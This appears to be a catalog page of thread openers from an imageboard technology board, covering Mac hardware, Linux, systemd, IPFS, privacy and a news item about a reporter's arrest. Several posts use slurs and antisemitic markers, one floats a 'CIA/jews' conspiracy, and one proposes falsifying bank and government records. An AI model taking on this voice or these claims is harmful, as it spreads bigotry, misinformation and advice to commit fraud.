See this piece of shit that got unveiled in WWDC? The monitor next to the new Mac Pro cheesegrater.

That monitor costs $4999. It's impressive, to be sure. 6K and all.

That monitor comes without a fucking stand.


https://www.youtube.com/watch?v=PPiEpSMkzoo (Linus TT)

R: 12 / I: 0 / P: 16 [R] [G] [-]

Android Spyware

So my girl thinks her ex, who bought her her phone, put spyware on it. Is there any surefire way to tell what someone might have installed, short of a reinstall, of telling what might have been put on an Android without ur consent? I've gone through everything I can find but she's worried that good hacks will hide it.

>inb4 tell that roastie stfu

>inb4 buy her a new one

R: 15 / I: 4 / P: 16 [R] [G] [-]

ArsTechnica reporter charged by the FBI in connection with attempting to solicit sex with minors

>Peter Bright, a prominent tech reporter who covered Microsoft for Ars Technica, was charged in connection with attempting to solicit sex with a minor, according to a Daily Dot report Friday.

>Bright, who is apparently no longer employed by Ars Technica, is charged in connection with arranging to engage in sexual activity with a 7-year-old girl and a 9-year-old boy, according to a federal complaint filed Friday that was cited by the Daily Dot.

>The complaint also said that Bright claimed to have molested an 11-year-old girl.

>Prominent tech reporter Peter Bright, age 38, was charged on Friday in connection with soliciting sex from minors online, according to a Daily Dot report.

>Bright, who worked for tech blog Ars Technica and is well-known in tech circles for his coverage of Microsoft, was charged in connection with attempting to molest two young children after a sting operation with federal officials, according to a federal complaint filed Friday, the Daily Dot reported.

>Bright was reportedly charged after meeting with an undercover agent who he believed to be the mother of two children he allegedly intended to molest. The complaint also said that Bright had claimed to have molested an 11-year-old girl.

>Bright is currently being held at the Metropolitan Correctional Center in Manhattan without bail, according to the Department of Justice's federal inmate locator.

>The Daily Dot report states that Bright is no longer employed by Ars Technica.

>Ars Technica, which is owned by the parent company of magazine publisher Conde Nast, did not respond to Business Insider's request for comment.


R: 22 / I: 1 / P: 16 [R] [G] [-]

Quick exit button

Hey everyone, just a reminder to add a quick exit button on your website


R: 34 / I: 6 / P: 16 [R] [G] [-]


Proper mini ITX ARM64 board with

16 core Cortex A72 @ 2.2GHz

2 x DDR4 SODIMM slots

1 x M.2 2240/2280

2 x SPF+

1 x 1GbE

1 x open ended x8 PCIE slot

4 x SATA 3

Preproduction Board: $550.00

Final Product: $750.00 11/19

Yes bigot, Solidrun is an Israeli company.





R: 38 / I: 5 / P: 16 [R] [G] [-]

>Mobile Safari finally getting native file downloads

>iPad Safari finally defaulting to desktop mode

>Files app no longer useless and superficial and also includes folder sharing and a built-in file server

>Desktop-level multitasking

>performance improvements

>Supports devices as old as late 2014

Apple finally just making iOS on iPads Mac OS-Lite instead of iPhone OS-phat yeah I’m thinking they’re back.

R: 10 / I: 1 / P: 16 [R] [G] [-]

9 yrs later


You still can't import OVPN configurations through GNOME NetworkManager. was open source a mistake?

R: 14 / I: 0 / P: 16 [R] [G] [-]

What company's should i buy a domain from?

I am looking to buy a domain from Dyn i want a cheap company that will hide my info from DNS records and not de platform me.

R: 49 / I: 5 / P: 16 [R] [G] [-]


Why did XNU/Darwin fail outside of Apples own projects?

R: 12 / I: 3 / P: 16 [R] [G] [-]

Who else remembers and misses this Firefox feature?

R: 106 / I: 19 / P: 16 [R] [G] [-]

Are you really a programmer? Show us your own 8ch downloader then.

Here's mine.

R: 14 / I: 3 / P: 16 [R] [G] [-]

Build me a machine equal to the new Mac

So /tech/ and /g/ seem to think that the new mac is LOL CRAPPLEL TAX because the base system specs could be beaten by a machine a fifth of the price.

What /tech/ and /g/ apparently are too retarded to understand is that those base system specs include a great deal of headroom.

Your mission, should you be a bad enough dude to accept it, is to build a system using all resources at your disposal that:

- Costs no more than $6000 US MSRP

- Has directly equivalent parts to the contents of the base model (pay attention to the dual 10Gb ethernet)). Thunderbolt can be replaced with USB at your discretion.

- Has the ability to be expanded with:

- At least four GPUs,

- 1.5TB of ECC memory running no slower than 2933MHz,

- No fewer than 28 cores. (You can achieve this core count however you wish, going over is fine.)

- An additional M2 drive

- Apple-specific stuff like the 2-in-1 GPU ("MPX") cards and accelerator cards can be ignored.

- All of these components must be cooled in a way that:

- The system is able to run at max CPU+GPU usage without thermal throttling or hitting TJMAX.

- The system is bearable to sit next to and usable for audio work. Consider a maximum noise level of 30DBa at 1 meter away (the level of a room fan on low from the same distance).. ideally lower.

- Isn't gamer/enthusiast or datacenter-based (no external radiators, no rackmount chassis)

- Does not require overclocking of either the CPU, GPU, or memory to hit these specs.

Can it be done?

R: 10 / I: 1 / P: 17 [R] [G] [-]


what's the best compiler for html (php, ajax) coding in your opinion?

I'm getting tired of using a txt file with no error handling

R: 31 / I: 10 / P: 17 [R] [G] [-]

Purism: *Autistic Screeching* It's ok when we do it



Social justice warriors are buthurt because Purism refused to sign their CoC and censor the "harmful"content.

Tbh I didn't trust purism (and still don't) because of how they lied about the librem (sojucs were praising it) but with this they're just coming back into my interest.

Old sojuc fagshit: https://vulpine.club/@rey/102021797820482084

R: 40 / I: 5 / P: 17 [R] [G] [-]

Opening the filesystems royale

Long time lurker. Never read a discussion on filesystems on /tech. Does it make any difference at all? I've been rolling with LUKS-encrypted BTRFS raid-1 for storage and XFS for everything else. Quite uncomfortable. We know they got taken over by Facecuck and (((Red Hat))), but how fucked up are these projects at the moment? What do you folks suggest?

R: 23 / I: 7 / P: 17 [R] [G] [-]

Reverse engineering

Hey I'm new to Reverse engineering any recommended books to get me started? Share tips and your story of how you became a RE.

R: 18 / I: 1 / P: 17 [R] [G] [-]

Program in c# and javascript because it's the closest thing to lisp you can get a job programming.

R: 12 / I: 2 / P: 17 [R] [G] [-]

Name your favourite mouse at the moment

>Mine is the Logitech M535





-Has that scroll speed button.

-Dexterity Neutral (I'm a Lefty)

-Light on batteries (1 AA that lasts a year)

-No annoying neons or lights

-easily disassembled

-comes with a warranty

You got any recommendations yourself?

R: 12 / I: 1 / P: 17 [R] [G] [-]

Smartphone recommendations

Which smartphone do you use?

Which ones you recommend?

R: 90 / I: 15 / P: 17 [R] [G] [-]

Do we need a higher resolution than 640x480? Why? What is the ideal resolution?

R: 32 / I: 2 / P: 17 [R] [G] [-]

Why the fuck is gtk3 such a bloat compared to 2?

Seriously, look at how they both structure their themes. GTK2 has pretty much one fucking file to edit a theme, and it's easy to understand. On the other hand, gtk3 has 16 - which take about 500KB compared to the former's single 30KB file. And here I was thinking I'm almost done with my xfce theme - looks like I'm not going to finish it in this lifetime.

Has the tech world in general went astray? Are they missing the point of what software is supposed to accomplish? Simpler is better as long as it does what's needed, and gtk2 did...This also applies to browsers (obviously), init systems (you know the culprit...), everything. How free does FOSS make us these days, really?

R: 47 / I: 3 / P: 17 [R] [G] [-]

Terrorist PC: VIA edition

is VIA as botnet as Intel and AMD? It seems to not have ME/PSP

VIA is Taiwanese, not (((American)))






is it suitable for terrorist PC? If you were Osama bin Laden or Ted Kaczynski, what would you use?

R: 18 / I: 2 / P: 17 [R] [G] [-]

Tusky discusses banning gab.com from the app itself


R: 11 / I: 1 / P: 17 [R] [G] [-]

Alan Turing

If Alan Turing lived today what color would his programmer socks be?

R: 17 / I: 0 / P: 17 [R] [G] [-]

Literate programming

I just found out about this. Basically, a book is written to explain the workings of a program. The book is the source. The program can be compiled from a pdf.

>Most programmers are still locked into the idea of making a program out of a large pile of tiny files containing pieces of programs. They do not realize that this organization was forced by the fact that machines like the PDP 11 only

had 8k of memory and a limit of 4k buffers in the editor. Thus there was a lot of machinery built up, such as overlay linkers, to try to reconstruct the whole program.

>The time has come to move into a more rational means of creating and maintaining programs. Knuth suggested we write programs like we write literature, with the idea that we are trying to communicate the ideas to other people. The

fact that the machine can also run the programs is a useful side-effect but not important.

Source (this a literate implementation of clojure): https://github.com/daly/literateclojure/blob/master/clojure.pdf

R: 28 / I: 2 / P: 17 [R] [G] [-]

Self-Driving cars

When self driving cars become a commonplace thing, how can we enjoy the luxury of a self driving car without being at the mercy of others?

R: 32 / I: 8 / P: 17 [R] [G] [-]

systemd Clocks In At More Than 1.2 Million Lines



Five years ago today was the story on Phoronix how the systemd source tree was approaching 550k lines so curiosity got the best of me to see how large is the systemd Git repository today. Well, now it's over 1.2 million lines.

After surpassing one million lines in 2017, when running GitStats on the systemd Git repository today it's coming in at 1,207,302 lines. Those 1.2 million lines are spread across 3,260 files and made over 40,057 commits from nearly 1,400 different authors.

Systemd saw a record number of commits last year but so far for 2019 it's hard to see that record being broke yet again. So far this year have been 2,145 commits while last year saw 6,245 commits while 2016 and 2017 each saw less than four thousand commits total.

Lennart Poettering continues being the most prolific contributor to systemd with more than 32% of the commits so far this year. The most other prolific authors this year include Yu Watanabe, Zbigniew Jędrzejewski-Szmek, Frantisek Sumsal, Susant Sahani, and Evgeny Vereshchagin. Around 142 people have contributed to the systemd source tree year to date.

R: 46 / I: 1 / P: 18 [R] [G] [-]

Icecat Updated to v60.5.0ESR

New modifications to the git

git clone git://git.savannah.gnu.org/gnuzilla.git

>* Hardened privacy settings: spoof referers by default, isolate requests to first party origin, and disable sending the origin header to the HTTP server.

>* Extensions:

>"LibreJS" updated to 7.19rc3, Now with Android support!

>Added "ViewTube" + "disable-polymer-youtube" extensions, which allow to browse and play >Youtube videos without JavaScript

>"TorButton" updated to 0.1.

>"HTTPS Everywhere" updated to 2019.1.31

>Improved interface for "Reveal hidden HTML"

>"Third Party Request Blocker" configured to allow requests to subdomains of the same site, known CDN servers (this is fine since we don't send referrers or origin headers), css files, and Youtube resource servers.

>"Third Party Request Blocker" configured to prevent scripts from capturing mouse and keyboard events, as well as zero-width-character tracking mechanisms.

R: 14 / I: 2 / P: 18 [R] [G] [-]

systemd alternative?

Is there alternative to systemd t hat isn't devuan (run by a jamacian SJW). and void linux is a bunch of antifa cucks so avoiding that too.

R: 45 / I: 6 / P: 18 [R] [G] [-]

What does /tech/ think of Funtoo?

I been thinking to use Funtoo instead of Void.

It seemed better to learn how to use Portage.

Does Funtoo really work alot better or should I use Gentoo?

Is there any Funtoo users who use it?

I'm some guy who uses LMMS to make music anyways & also plays HL2 Deathmatch all night when I get tired.

R: 20 / I: 3 / P: 18 [R] [G] [-]

Those feel-good moments in tech

What was a memorable feel-good moment for you in technology? For me, it was the first time I wrote a program that made any noticable difference in CPU usage and wasn't just sitting there wasting cycles. It was a real

>hey, this thing is actually churning through data


R: 29 / I: 2 / P: 18 [R] [G] [-]

Okay how secure will I be if I do the following?

>Delete all my online accounts

>Falsify my address and personal data in all the government and bank documents and change then immediately afterwards (Getting an old phone number, moving to another state, etc...)

>Unsubscribe from all paid services and schemes that asks for personal data

>Format my whole PC and start afresh

>Use another WiFi to route all traffic through tor except maybe updation and torrent

>Use firewall to block all unnecessary connections

>Use an always on VPN

>Get a new ISP provider

>Only use software recommended by privacy experts and use a sandbox/guest account to run necessary proprietary apps

So how secure will I be? Have I left to do anything else?

R: 338 / I: 74 / P: 18 [R] [G] [-]

/ipfs/ - IPFS Thread #3

Last thread:

>>915966 (https://archive.is/rQakE)



>ipfs 0.4.17 is a quick release to fix a major performance regression in bitswap (mostly affecting go-ipfs → js-ipfs transfers). However, while motivated by this fix, this release contains a few other goodies that will excite some users.

>The headline feature in this release is urlstore support. Urlstore is a generalization of the filestore backend that can fetch file blocks from remote URLs on-demand instead of storing them in the local datastore.

>Additionally, we've added support for extracting inline blocks from CIDs (blocks inlined into CIDs using the identity hash function). However, go-ipfs won't yet create such CIDs so you're unlikely to see any in the wild.


>URLStore (ipfs/go-ipfs#4896)

>Add trickle-dag support to the urlstore (ipfs/go-ipfs#5245).

>Allow specifying how the data field in the object get is encoded (ipfs/go-ipfs#5139)

>Add a -U flag to files ls to disable sorting (ipfs/go-ipfs#5219)

>Add an efficient --size-only flag to the repo stat (ipfs/go-ipfs#5010)

>Inline blocks in CIDs (ipfs/go-ipfs#5117)


>Make ipfs files ls -l correctly report the hash and size of files (ipfs/go-ipfs#5045)

>Fix sorting of files ls (ipfs/go-ipfs#5219)

>Improve prefetching in ipfs cat and related commands (ipfs/go-ipfs#5162)

>Better error message when ipfs cp fails (ipfs/go-ipfs#5218)

>Don't wait for the peer to close it's end of a bitswap stream before considering the block "sent" (ipfs/go-ipfs#5258)

>Fix resolving links in sharded directories via the gateway (ipfs/go-ipfs#5271)

>Fix building when there's a space in the current directory (ipfs/go-ipfs#5261)

tl;dr for Beginners

>decentralized P2P network

>like torrenting, but instead of getting a .torrent file or magnet link that shares a pre-set group of files, you get a hash of the files which is searched for in the network and served automatically

>you can add files to the entire network with one line in the CLI or a drag-and-drop into the web interface

>HTTP gateways let you download any hash through your browser without running IPFS

>can stream video files in mpv or VLC (though it's not recommended unless the file has a lot of seeds)

How it Works

When you add a file, the files are cryptographically hashed and a merkle tree is created. These hashes are announced by the IPFS client to the nodes in the network. (The IPFS team often describes the network as a "Merkle forest.") Any user can request one of these hashes and the nodes set up peer connections automatically. If two users share the same file then both of them can seed it to a third person requesting the hash, as opposed to .torrent files/magnets which require both seeders use the same file.


>Is it safe?

It's about as safe as a torrent right now, ignoring the relative obscurity bonus. They are working on integration with TOR and I2P. Check out libp2p if you're curious.

>Is it fast?

Finding a seeder can take anywhere from a few seconds to a few minutes. It's slowly improving but still requires a fair bit of optimization work. Once the download starts, it's as fast as the peers can offer, just like a torrent.

>Is it a meme?

You be the judge.

It has implementations in Go (meant for desktop integration) and Javascript (meant for browser/server integration) in active development that are functional right now, it has a bunch of side projects that build on it, and it divides important parts of its development (IPLD, libp2p, etc) into separate projects that allow for drop-in support for many existing technologies.

On the other hand, it's still alpha software with a small userbase and has poor network performance.

Websites of interest


Official IPFS HTTP gateway. Slap this in front of a hash and it will download a file from the network. Be warned that this gateway is slower than using the client and accepts DMCAs.

glob.me — dead

R: 51 / I: 5 / P: 18 [R] [G] [-]

CIA shuts down independent imageboards

>nanochan admin posts on 26 May 2019 that he no longer wants to keep nanochan

>lolifox admin makes chan read-only and wants to quit, happened on 26 May 2019

>endchan only sometimes works since 26 May 2019


post your conspiracy theories

I start:

-it is coordinated CIA/jews attack to stop independent chans and only leave CIA chan (8chan)

-nanochan admin and lolifox admin are the same person

also do not forget that recently CIA destroyed Tor posting on 8chan. you need to solve one captcha per post, or even two captchas per every post on popular boards

R: 20 / I: 5 / P: 18 [R] [G] [-]

ESR: "revokists" have it right. [Regarding GPL License]

http://esr.ibiblio.org/?p=8317 (Archive link: http://archive.fo/5IpEL )

A commentator asked on Eric S. Raymond's website:

>ESR: Eben Moglen suggested that he was going to write a paper refuting the notion that "The GPL is revocable":


>>I think the best procedure would be for me to publish my analysis and

>>for you then to tell me what is wrong with it.



>Why has no such paper from him materialized?

ESR response was shocking, blunt, and to the point:

>esr on 2019-05-30 at 08:08:23 said:


>>Why has no such paper from him materialized?


>Because Moglen is either wrong about or deliberately misrepresenting the law and the "revokists" have it right. Thank you, I had already figured this out from his (non)responses on lkml.

R: 29 / I: 0 / P: 18 [R] [G] [-]

Is it really worth it to learn VIm over Visual Studio Code?

Visual Studio Code is nice and easy to use and easy to navigate a project.

R: 11 / I: 8 / P: 18 [R] [G] [-]


<32 chars 32 chars 32 chars 32 chars

R: 65 / I: 9 / P: 18 [R] [G] [-]

Linux Kernel ‘Version Final’

Do you think it’s possible for a piece of software like Linux to ever reach a final version and never need an update again and everyone would be satisfied with it? Or is kernel/OS development an endless game of cat and mouse whenever new security holes and bugs are introduced as more and more libraries are being added and more and more hardware is getting supported ad infinitum

R: 18 / I: 5 / P: 18 [R] [G] [-]

Britbongistan testing facial recognition


I feel like a caged animal in my own country I didn't ask to live like this I just wanted to post memes and watch anime.

R: 28 / I: 2 / P: 18 [R] [G] [-]

Is it possible for someone in this day and age to break modern casino slots? A man once told me Las Vegas slot machine software is more secure then the NSA. Do you think this is true? This type of shit has just always interested me. The average person never really thinks about the software engineering that is behind slot machines

R: 21 / I: 3 / P: 18 [R] [G] [-]

Growing online presents

We all know the internet is pozzed to shit but some of us still enjoy making videos on old tech and obscure hardware. If you wanted to grow a tech channel but wanted to stay as anonymous as possible outside of your voice how would you do it? What would you do to promote the channel and get your viewer counts up?

If you want to be autistic then imagine you're trying to make a channel to promote good open source software and avoid the SJW pozzing of everything

R: 101 / I: 4 / P: 18 [R] [G] [-]

The install Gentoo Wiki

The Install Gentoo wiki is more or less dead. I have become the primary contributor to it. (I am https://wiki.installgentoo.com/wiki/User:Se7en1) As the new primary contributor, I contacted bannanafish in an attempt to get admin status but he has not responded.

Anyway, we have an official wiki and none of you are taking part in it. I implore you all to begin editing it again to ensure accurate information.


R: 43 / I: 3 / P: 19 [R] [G] [-]

Poettering does it again

SystemD uses rand() to generate random bytes for cryptographic purposes.